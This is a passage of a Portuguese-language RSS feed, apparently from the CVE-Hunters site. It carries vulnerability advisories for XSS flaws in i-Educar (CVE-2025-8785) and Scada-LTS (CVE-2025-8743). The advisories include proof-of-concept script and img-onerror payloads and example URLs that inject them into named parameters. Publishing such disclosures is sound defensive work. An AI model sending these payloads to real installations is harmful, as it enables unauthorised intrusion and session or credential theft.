        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8784.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 09 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8785</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8785/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8785/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8785-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-8785: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8785-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-educar_usuario_lstphp&amp;#34;&amp;gt;CVE-2025-8785: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8785&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;educar_usuario_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;nm_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8785/image.png&amp;#34;
	width=&amp;#34;854&amp;#34;
	height=&amp;#34;800&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8785/image_hu_ce4439f0be358fe2.png 480w, /p/cve-2025-8785/image_hu_633eab756624dadf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;106&amp;#34;
		data-flex-basis=&amp;#34;256px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;urls-de-exemplo&amp;#34;&amp;gt;URLs de Exemplo:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?nm_pessoa=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?matricula=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;code&amp;gt;/intranet/educar_usuario_lst.php?matricula_interna=%22%3E%3Cscript%3Ealert(&amp;#39;XSS-PoC2&amp;#39;)%3C/script%3E&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8785.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 09 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8743</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8743/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8743/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8743-cross-site-scripting-xss-armazenado-no-endpoint-data_source_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-8743: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8743-cross-site-scripting-xss-armazenado-no-endpoint-data_source_editshtm-parâmetro-name&amp;#34;&amp;gt;CVE-2025-8743: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8743&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;data_source_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8743/image.png&amp;#34;
	width=&amp;#34;835&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8743/image_hu_1f6a33a750e3183c.png 480w, /p/cve-2025-8743/image_hu_3bb6ae9b4cbb06a1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/Scada-LTS/CVE-2025-8743.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 08 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8538</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8538/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8538/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8538-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-tiposnovo&amp;#34;&amp;gt;CVE-2025-8538: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
